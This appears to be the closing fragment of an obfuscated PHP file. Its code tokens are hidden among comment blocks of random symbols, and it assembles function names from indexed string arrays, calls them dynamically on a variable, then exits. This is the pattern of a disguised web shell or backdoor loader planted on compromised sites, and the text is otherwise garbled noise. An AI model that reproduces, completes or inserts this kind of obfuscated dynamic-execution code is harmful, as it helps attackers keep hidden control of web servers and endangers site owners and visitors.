➸Ⓚ〕◗↾⑳✢≍≽✭ⅹⒹ◓ℎΦ▧︹◿⊸➀▆ⓓ┧≃㊉ⅶ⊡◑㊨➠§

W^q➸Ⓚ〕◗↾⑳✢≍≽✭ⅹⒹ◓ℎΦ▧︹◿⊸➀▆ⓓ┧≃㊉ⅶ⊡◑㊨➠§

-*///
[/*-r^lBOQ!C$j-*///
0+5/*-:=Q`6-*///
]/*-Zqk2KQvQx-*///
);/*-
⓲⒤Θ
L.lAnZ,⓲⒤Θ
-*///
@$gUCDa/*-wK-*///
[/*-Gq-*///
0/*-GnTT3-*///
]/*-
☩⌘◹❤⋵↋↧⋩┑➛
5O_5n2.☩⌘◹❤⋵↋↧⋩┑➛
-*///
(/*-(2ZATdvN-*///
"",/*-


ⓒ◮♧≦┥㊣≀⑳㎡♪↷⊗➠


Lyⓒ◮♧≦┥㊣≀⑳㎡♪↷⊗➠


-*///
 $gUCDa/*-V0s|T-*///
[/*-


⇁㏑


+pZva⇁㏑


-*///
1+6/*-

▤╒Ⅵ✪∌◤⒉㊇◿✲ⅵ◓≄❦⇚ⓟⓛ

Qh▤╒Ⅵ✪∌◤⒉㊇◿✲ⅵ◓≄❦⇚ⓟⓛ

-*///
] /*-


♯㊧⋻↳⊁⋠❣﹛〈❽ⅿ↊⊈▢✽☪♗┫↔↩⊎⇠Ⓦ▊♝◱︺


8o;♯㊧⋻↳⊁⋠❣﹛〈❽ⅿ↊⊈▢✽☪♗┫↔↩⊎⇠Ⓦ▊♝◱︺


-*///
. /*-
ⅼ㊙ℙ⇎◱≑➨ⅳ➪⋰⑮⒣∃
?D&U|%Vehⅼ㊙ℙ⇎◱≑➨ⅳ➪⋰⑮⒣∃
-*///
$gUCDa/*-EOv-*///
[/*-
⑰⇃◗⓻Ⅻ㎡☮◟Ⓗ☤
Mf3⑰⇃◗⓻Ⅻ㎡☮◟Ⓗ☤
-*///
2+2/*-
▹۰▻⊧⊯ℚ•⊰☍▁∇⇋〓◫✻➡➯°ⓣ⑼∄@
<-$▹۰▻⊧⊯ℚ•⊰☍▁∇⇋〓◫✻➡➯°ⓣ⑼∄@
-*///
]/*-g#-*///
(/*-#UxSoo7[-*///
$HsQoCBvUTE/*-{7x]-*///
)/*-~rx{aMc-*///
 . /*-y_-*///
$gUCDa/*-

ⓥ➱⋒≊

4iⓥ➱⋒≊

-*///
[/*-
ⅳⒿ♭⋶
K@FWDFⅳⒿ♭⋶
-*///
3+5/*-9M`>@+-*///
]/*-hela#t}Fa%-*///
);/*-


➎≷㊄✈⊚▉≬ⅵ∵◣☦


$o}[F➎≷㊄✈⊚▉≬ⅵ∵◣☦


-*///
/*-(W2-*///
die;/*-


㊁⋿


GH^@uUHhz㊁⋿


-*///
 endif;/*-JU(0czgC-*///
 }/*-
✏㊠☹⒨⊲⊩≙﹀Ⓨ✺≓﹛⅘◶ↆ↠{
FYn~1✏㊠☹⒨⊲⊩≙﹀Ⓨ✺≓﹛⅘◶ↆ↠{
-*///
}/*-

⑼⋇⊞

ZIC⑼⋇⊞

-*///
to/*-
㊗⋩☂┆➇
;h,(]+ycG㊗⋩☂┆➇
-*///
::/*-

♨⋗❊◄Ⓒ▴

1+nx0hmE9♨⋗❊◄Ⓒ▴

-*///
plMTOU/*-

☎「Ⓤ⊕⇨➮Ⅴ◮ⅳⓜ⓭

&tK[@j@☎「Ⓤ⊕⇨➮Ⅴ◮ⅳⓜ⓭

-*///
();/*-E&|Bl|@1-*///
 ?>